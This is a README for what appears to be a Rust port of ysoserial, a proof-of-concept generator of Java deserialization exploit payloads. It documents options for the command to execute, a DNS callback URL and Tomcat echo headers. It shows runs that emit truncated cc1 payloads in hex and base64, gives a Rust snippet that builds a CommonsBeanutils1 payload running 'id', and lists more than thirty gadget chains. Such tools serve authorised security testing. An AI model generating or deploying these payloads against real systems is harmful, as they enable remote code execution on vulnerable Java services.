- ysoserial implemented by rust
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Usage: ysoserial [-p <payload>] [-c <command>] [--url <url>] [--echo-name <echo-name>] [--command-name <command-name>] [-o <output>] [-f <format>] [-l]
ysoserial-rs
Options:
-p, --payload select a payload
-c, --command command to execute
--url url to request dns
--echo-name tomcat echo request header name
--command-name tomcat command request header name
-o, --output save payload to file
-f, --format format to hex or base64
-l, --list list all payload
--help display usage information
- hex
➜ ysoserial-rs git:(main) ✗ ysoserial -p cc1 -c whomai -f hex
aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f...- base64
➜ ysoserial-rs git:(main) ✗ ysoserial -p cc1 -c whomai -f base64
rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYm...➜ ysoserial-rs git:(main) ✗ ysoserial -p cc1 -c whomai -o cc1.ser
写入文件:cc1.ser,payload大小:1395
➜ ysoserial-rs git:(main) ✗ cat cc1.ser|xxd -ps
aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e
2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255ca
...cargo run --example examples- Please refer to the examples directory for details
use std::fs::File;
use std::io;
use std::io::Write;
use ysoserial_rs::get_commons_beanutils1;
fn main() -> Result<(), io::Error> {
let mut file = File::create("commons_beanutils1.ser")?;
file.write_all(&get_commons_beanutils1("id"))?;
Ok(())
}- bs1
- cc1
- cc2
- cc3
- cc4
- cc5
- cc6
- cc7
- cck1
- cck2
- cck3
- cck4
- clojure
- groovy1
- hibernate1
- hibernate2
- javassist_weld1
- jboss_interceptors1
- jdk7u21
- jdk8u20
- json1
- mozilla_rhino1
- mozilla_rhino2
- myfaces1
- rome
- spring1
- spring2
- cck1_tomcat_echo
- cck2_tomcat_echo
- url_dns
- c3p0
- vaadin1
- shiro_spc